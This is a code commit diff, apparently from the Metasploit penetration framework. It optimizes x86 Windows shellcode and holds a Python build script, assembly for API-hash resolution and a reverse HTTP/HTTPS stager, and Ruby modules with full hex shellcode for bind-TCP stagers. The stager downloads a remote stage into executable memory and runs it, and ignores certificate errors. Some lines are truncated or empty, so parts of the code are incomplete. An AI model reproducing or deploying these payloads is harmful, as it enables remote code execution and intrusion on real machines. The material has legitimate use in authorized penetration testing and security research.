Land #2946, @jlee-r7's optimization of the x86 block_api code
@ -1,124 +1,128 @@
# A simple python build script to build the singles/stages/stagers and
# some usefull information such as offsets and a hex dump. The binary output
# will be placed in the bin directory. A hex string and usefull comments will
# be printed to screen.
# Example:
# >python stager_reverse_tcp_nx
# Example, to build everything:
# >python all > build_output.txt
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
import os, sys, time
from subprocess import Popen
from struct import pack
def clean( dir="./bin/" ):
for root, dirs, files in os.walk( dir ):
for name in files:
os.remove( os.path.join( root, name ) )
def locate( src_file, dir="./src/" ):
for root, dirs, files in os.walk( dir ):
for name in files:
if src_file == name:
return root
return None
def build( name ):
location = locate( "%s.asm" % name )
if location:
input = os.path.normpath( os.path.join( location, name ) )
output = os.path.normpath( os.path.join( "./bin/", name ) )
p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
xmit( name )
print "[-] Unable to locate '%s.asm' in the src directory" % name
def xmit_dump_ruby( data, length=16 ):
dump = ""
for i in xrange( 0, len( data ), length ):
bytes = data[ i : i+length ]
hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
if i+length <= len(data):
hex += " +"
dump += "%s\n" % ( hex )
print dump
def xmit_offset( data, name, value ):
offset = data.find( value );
if offset != -1:
print "# %s Offset: %d" % ( name, offset )
def xmit( name, dump_ruby=True ):
bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
f = open( bin, 'rb')
data =
print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
xmit_offset( data, "LEPort", pack( "<H", 4444 ) ) # 4444
xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) #
xmit_offset( data, "IPv6Host", pack( "<Q", 0xBBBBBBBBBBBBBBB1 ) ) # An IPv6 Address
xmit_offset( data, "IPv6ScopeId", pack( "<L", 0xAAAAAAA1 ) ) # An IPv6 Scope ID
xmit_offset( data, "RetryCounter", "\x6a\x05" ) # socket retry
xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) ) # Filler
xmit_offset( data, "Hostname", "https" )
xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
xmit_offset( data, "EggTag1", pack( "<L", 0xDEADDEAD ) ) # Egg tag 1
xmit_offset( data, "EggTag2", pack( "<L", 0xC0DEC0DE ) ) # Egg tag 2
xmit_offset( data, "EggTagSize", pack( ">H", 0x1122 ) ) # Egg tag size
xmit_offset( data, "RC4Key", "RC4KeyMetasploit") # RC4 key
xmit_offset( data, "XORKey", "XORK") # XOR key
if( name.find( "egghunter" ) >= 0 ):
null_count = data.count( "\x00" )
if( null_count > 0 ):
print "# Note: %d NULL bytes found." % ( null_count )
if dump_ruby:
xmit_dump_ruby( data )
def main( argv=None ):
if not argv:
argv = sys.argv
if len( argv ) == 1:
print "Usage: [clean|all|<name>]"
print "# Built on %s\n" % ( time.asctime( time.localtime() ) )
if argv[1] == "clean":
elif argv[1] == "all":
for root, dirs, files in os.walk( "./src/egghunter/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/migrate/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/single/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/stage/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/stager/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/kernel/" ):
for name in files:
build( name[:-4] )
build( argv[1] )
except Exception, e:
print "[-] ", e
if __name__ == "__main__":
# A simple python build script to build the singles/stages/stagers and
# some usefull information such as offsets and a hex dump. The binary output
# will be placed in the bin directory. A hex string and usefull comments will
# be printed to screen.
# Example:
# >python stager_reverse_tcp_nx
# Example, to build everything:
# >python all > build_output.txt
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
import os, sys, time
from subprocess import Popen
from struct import pack
def clean( dir="./bin/" ):
for root, dirs, files in os.walk( dir ):
for name in files:
os.remove( os.path.join( root, name ) )
def locate( src_file, dir="./src/" ):
for root, dirs, files in os.walk( dir ):
for name in files:
if src_file == name:
return root
return None
def build( name ):
location = locate( "%s.asm" % name )
if location:
input = os.path.normpath( os.path.join( location, name ) )
output = os.path.normpath( os.path.join( "./bin/", name ) )
p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
xmit( name )
print "[-] Unable to locate '%s.asm' in the src directory" % name
def xmit_dump_ruby( data, length=16 ):
dump = ""
for i in xrange( 0, len( data ), length ):
bytes = data[ i : i+length ]
hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
if i+length <= len(data):
hex += " +"
dump += "%s\n" % ( hex )
print dump
def xmit_offset( data, name, value, match_offset=0 ):
offset = data.find( value );
if offset != -1:
print "# %s Offset: %d" % ( name, offset + match_offset )
def xmit( name, dump_ruby=True ):
bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
f = open( bin, 'rb')
data =
print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
xmit_offset( data, "LEPort", pack( "<H", 4444 ) ) # 4444
xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) #
xmit_offset( data, "IPv6Host", pack( "<Q", 0xBBBBBBBBBBBBBBB1 ) ) # An IPv6 Address
xmit_offset( data, "IPv6ScopeId", pack( "<L", 0xAAAAAAA1 ) ) # An IPv6 Scope ID
xmit_offset( data, "RetryCounter", "\x6a\x05", 1 ) # socket retry
xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) ) # Filler
xmit_offset( data, "Hostname", "https" )
xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
xmit_offset( data, "EggTag1", pack( "<L", 0xDEADDEAD ) ) # Egg tag 1
xmit_offset( data, "EggTag2", pack( "<L", 0xC0DEC0DE ) ) # Egg tag 2
xmit_offset( data, "EggTagSize", pack( ">H", 0x1122 ) ) # Egg tag size
xmit_offset( data, "RC4Key", "RC4KeyMetasploit") # RC4 key
xmit_offset( data, "XORKey", "XORK") # XOR key
if( name.find( "egghunter" ) >= 0 ):
null_count = data.count( "\x00" )
if( null_count > 0 ):
print "# Note: %d NULL bytes found." % ( null_count )
if dump_ruby:
xmit_dump_ruby( data )
def main( argv=None ):
if not argv:
argv = sys.argv
if len( argv ) == 1:
print "Usage: [clean|all|<name>]"
print "# Built on %s\n" % ( time.asctime( time.localtime() ) )
if argv[1] == "clean":
elif argv[1] == "all":
for root, dirs, files in os.walk( "./src/egghunter/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/migrate/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/single/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/stage/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/stager/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/kernel/" ):
for name in files:
build( name[:-4] )
build( argv[1] )
except Exception, e:
print "[-] ", e
if __name__ == "__main__":
@ -23,7 +23,7 @@ api_call:
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
next_mod: ;
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
xor edi, edi ; Clear EDI which will store the hash of the module name
loop_modname: ;
xor eax, eax ; Clear EAX
@ -34,22 +34,25 @@ loop_modname: ;
not_lowercase: ;
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop untill we have read enough
loop loop_modname ; Loop until we have read enough
; We now have the module hash computed
push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later
; Proceed to itterate the export address table,
; Proceed to iterate the export address table,
mov edx, [edx+16] ; Get this modules base address
mov eax, [edx+60] ; Get PE header
add eax, edx ; Add the modules base address
mov eax, [eax+120] ; Get export tables RVA
test eax, eax ; Test if no export address table is present
jz get_next_mod1 ; If no EAT present, process the next module
add eax, edx ; Add the modules base address
push eax ; Save the current modules EAT
mov ecx, [eax+24] ; Get the number of function names
mov ebx, [eax+32] ; Get the rva of the function names
; use ecx as our EAT pointer here so we can take advantage of jecxz.
mov ecx, [eax+edx+120] ; Get the EAT from the PE header
jecxz get_next_mod1 ; If no EAT present, process the next module
add ecx, edx ; Add the modules base address
push ecx ; Save the current modules EAT
mov ebx, [ecx+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address
mov ecx, [ecx+24] ; Get the number of function names
; now ecx returns to its regularly scheduled counter duties
; Computing the module hash + function hash
get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
@ -66,14 +69,15 @@ loop_funcname: ;
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
jne loop_funcname ; If we have not reached the null terminator, continue
add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
cmp edi, [ebp+36] ; Compare the hash to the one we are searching for
jnz get_next_func ; Go compute the next function hash if we have not found it
; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva
mov ebx, [eax+36] ; Get the ordinal table rva
add ebx, edx ; Add the modules base address
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
mov ebx, [eax+28] ; Get the function addresses table rva
mov ebx, [eax+28] ; Get the function addresses table rva
add ebx, edx ; Add the modules base address
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
add eax, edx ; Add the modules base address to get the functions actual VA
@ -88,10 +92,11 @@ finish:
push ecx ; Push back the correct return value
jmp eax ; Jump into the required function
; We now automagically return to the correct caller...
get_next_mod: ;
pop eax ; Pop off the current (now the previous) modules EAT
get_next_mod1: ;
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
jmp short next_mod ; Process this module
jmp short next_mod ; Process this module
@ -6,6 +6,25 @@
[BITS 32]
%define HTTP_OPEN_FLAGS ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000 )
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x00000200 | ; INTERNET_FLAG_NO_UI
;0x00800000 | ; INTERNET_FLAG_SECURE
%define HTTP_OPEN_FLAGS ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 )
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x00000200 ; INTERNET_FLAG_NO_UI
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
@ -16,65 +35,74 @@ load_wininet:
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
xor ebx,ebx
xor edi,edi
push edi ; DWORD dwFlags
push edi ; LPCTSTR lpszProxyBypass
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
push byte 0 ; NULL pointer
push esp ; LPCTSTR lpszAgent ("\x00")
push ebx ; DWORD dwFlags
push ebx ; LPCTSTR lpszProxyBypass (NULL)
push ebx ; LPCTSTR lpszProxyName (NULL)
push ebx ; DWORD dwAccessType (PRECONFIG = 0)
push ebx ; LPCTSTR lpszAgent (NULL)
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
jmp short dbl_get_server_host
pop ebx ; Save the hostname pointer
xor ecx, ecx
push ecx ; DWORD_PTR dwContext (NULL)
push ecx ; dwFlags
push ebx ; DWORD_PTR dwContext (NULL)
push ebx ; dwFlags
push byte 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
push ecx ; password
push ecx ; username
push ebx ; password (NULL)
push ebx ; username (NULL)
push dword 4444 ; PORT
push ebx ; HOSTNAME
jmp short dbl_get_server_host ; push pointer to HOSTNAME
push eax ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp
jmp get_server_uri
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x00000200 | ; INTERNET_FLAG_NO_UI
push edx ; accept types
push edx ; referrer
push edx ; version
push ecx ; url
push edx ; method
push ebx ; dwContext (NULL)
push HTTP_OPEN_FLAGS ; dwFlags
push ebx ; accept types
push ebx ; referrer
push ebx ; version
jmp get_server_uri ; push pointer to url
push ebx ; method
push eax ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
mov esi, eax ; hHttpRequest
xchg esi, eax ; save hHttpRequest in esi
push byte 0x10
pop ebx
pop edi
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
push 0x00003380
mov eax, esp
push byte 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push esi ; hHttpRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
xor edi, edi
push edi ; optional length
push edi ; optional
push edi ; dwHeadersLength
push edi ; headers
push ebx ; lpOptional length (0)
push ebx ; lpOptional (NULL)
push ebx ; dwHeadersLength (0)
push ebx ; lpszHeaders (NULL)
push esi ; hHttpRequest
push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
call ebp
@ -82,28 +110,30 @@ httpsendrequest:
jnz short allocate_memory
dec ebx
jz failure
jmp short httpsendrequest
dec edi
jnz send_request
jmp get_server_host
call httpopenrequest
db "/12345", 0x00
; if we didn't allocate before running out of retries, fall through to
; failure
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
jmp get_server_host
call got_server_uri
db "/12345", 0x00
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (8Mb ought to do us)
push edi ; NULL as we dont care where the allocation is (zero'd from the prev function)
push ebx ; NULL as we dont care where the allocation is
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
@ -135,7 +165,7 @@ execute_stage:
ret ; dive into the stored stage address
call internetconnect
call got_server_host
@ -1,159 +0,0 @@
; Author: HD Moore
; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000
; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
; Version: 1.0
[BITS 32]
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
push 0x696e6977 ; ...
push esp ; Push a pointer to the "wininet" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
xor edi,edi
push edi ; DWORD dwFlags
push edi ; LPCTSTR lpszProxyBypass
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
push byte 0 ; NULL pointer
push esp ; LPCTSTR lpszAgent ("\x00")
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
jmp short dbl_get_server_host
pop ebx ; Save the hostname pointer
xor ecx, ecx
push ecx ; DWORD_PTR dwContext (NULL)
push ecx ; dwFlags
push byte 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
push ecx ; password
push ecx ; username
push dword 4444 ; PORT
push ebx ; HOSTNAME
push eax ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp
jmp get_server_uri
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00000200 ; INTERNET_FLAG_NO_UI
push edx ; accept types
push edx ; referrer
push edx ; version
push ecx ; url
push edx ; method
push eax ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
mov esi, eax ; hHttpRequest
push byte 0x10
pop ebx
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
push 0x00003380
mov eax, esp
push byte 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push esi ; hRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
xor edi, edi
push edi ; optional length
push edi ; optional
push edi ; dwHeadersLength
push edi ; headers
push esi ; hHttpRequest
push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
call ebp
test eax,eax
jnz short allocate_memory
dec ebx
jz failure
jmp short set_security_options
jmp get_server_host
call httpopenrequest
db "/12345", 0x00
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (8Mb ought to do us)
push edi ; NULL as we dont care where the allocation is (zero'd from the prev function)
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
xchg eax, ebx ; place the allocated base address in ebx
push ebx ; store a copy of the stage base address on the stack
push ebx ; temporary storage for bytes read count
mov edi, esp ; &bytesRead
push edi ; &bytesRead
push 8192 ; read length
push ebx ; buffer
push esi ; hRequest
push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
call ebp
test eax,eax ; download failed? (optional?)
jz failure
mov eax, [edi]
add ebx, eax ; buffer += bytes_received
test eax,eax ; optional?
jnz download_more ; continue until it returns 0
pop eax ; clear the temporary storage
ret ; dive into the stored stage address
call internetconnect
@ -1,19 +1,20 @@
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: > stager_reverse_tcp_nx
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_https.asm"
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: > stager_reverse_tcp_nx
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%define ENABLE_SSL 1
%include "./src/block/block_reverse_http.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
@ -198,7 +198,7 @@ class EncodedPayload
# Check to see if we have enough room for the minimum requirements
if ((reqs['Space']) and (reqs['Space'] < eout.length + min))
wlog("#{err_start}: Encoded payload version is too large with encoder #{encoder.refname}",
wlog("#{err_start}: Encoded payload version is too large (#{eout.length} bytes) with encoder #{encoder.refname}",
'core', LEV_1)
next_encoder = true
@ -85,21 +85,24 @@ module Msf::Payload::Windows::PrependMigrate
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop untill we have read enough
; We now have the module hash computed
push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later
; Proceed to iterate the export address table
mov edx, [edx+16] ; Get this modules base address
mov eax, [edx+60] ; Get PE header
add eax, edx ; Add the modules base address
mov eax, [eax+120] ; Get export tables RVA
test eax, eax ; Test if no export address table is present
jz get_next_mod1 ; If no EAT present, process the next module
add eax, edx ; Add the modules base address
push eax ; Save the current modules EAT
mov ecx, [eax+24] ; Get the number of function names
mov ebx, [eax+32] ; Get the rva of the function names
; use ecx as our EAT pointer here so we can take advantage of jecxz.
mov ecx, [eax+edx+120] ; Get the EAT from the PE header
jecxz get_next_mod1 ; If no EAT present, process the next module
add ecx, edx ; Add the modules base address
push ecx ; Save the current modules EAT
mov ebx, [ecx+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address
mov ecx, [ecx+24] ; Get the number of function names
; now ecx returns to its regularly scheduled counter duties
; Computing the module hash + function hash
get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
@ -118,6 +121,7 @@ module Msf::Payload::Windows::PrependMigrate
add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
jnz get_next_func ; Go compute the next function hash if we have not found it
; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva
@ -138,6 +142,7 @@ module Msf::Payload::Windows::PrependMigrate
push ecx ; Push back the correct return value
jmp eax ; Jump into the required function
; We now automagically return to the correct caller...
get_next_mod: ;
pop eax ; Pop off the current (now the previous) modules EAT
get_next_mod1: ;
@ -26,28 +26,32 @@ module Metasploit3
'Stager' =>
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 200, 'n' ] },
'Offsets' => { 'LPORT' => [ 197, 'n' ] },
'Payload' =>
# Length: 298 bytes
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
# Name: stager_bind_tcp_nx
# Length: 295 bytes
# Port Offset: 197
"\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
"\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57" +
"\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5" +
"\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D" +
"\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5" +
"\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53" +
"\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF" +
"\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
"\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
"\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
"\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
"\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
"\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" +
"\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" +
"\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31" +
"\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB" +
"\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57" +
"\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5" +
"\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" +
"\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
"\x93\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3" +
@ -33,38 +33,44 @@ module Metasploit3
'RequiresMidstager' => false,
'Offsets' =>
'LPORT' => [ 200, 'n' ],
'XORKey' => [ 260, '' ],
'RC4Key' => [ 324, '' ]
'LPORT' => [ 197, 'n' ],
'XORKey' => [ 257, '' ],
'RC4Key' => [ 321, '' ]
'Payload' =>
# Length: 411 bytes
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
# Name: stager_bind_tcp_rc4
# Length: 408 bytes
# Port Offset: 197
# RC4Key Offset: 321
# XORKey Offset: 257
"\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
"\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57" +
"\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5" +
"\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D" +
"\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5" +
"\x8B\x36\x81\xF6\x58\x4F\x52\x4B\x8D\x0E\x6A\x40\x68\x00\x10\x00" +
"\x00\x51\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x8D\x98\x00\x01\x00" +
"\x00\x53\x56\x50\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5" +
"\x01\xC3\x29\xC6\x85\xF6\x75\xEC\x5B\x59\x5D\x55\x57\x89\xDF\xE8" +
"\x10\x00\x00\x00\x52\x43\x34\x4B\x65\x79\x4D\x65\x74\x61\x73\x70" +
"\x6C\x6F\x69\x74\x5E\x31\xC0\xAA\xFE\xC0\x75\xFB\x81\xEF\x00\x01" +
"\x00\x00\x31\xDB\x02\x1C\x07\x89\xC2\x80\xE2\x0F\x02\x1C\x16\x8A" +
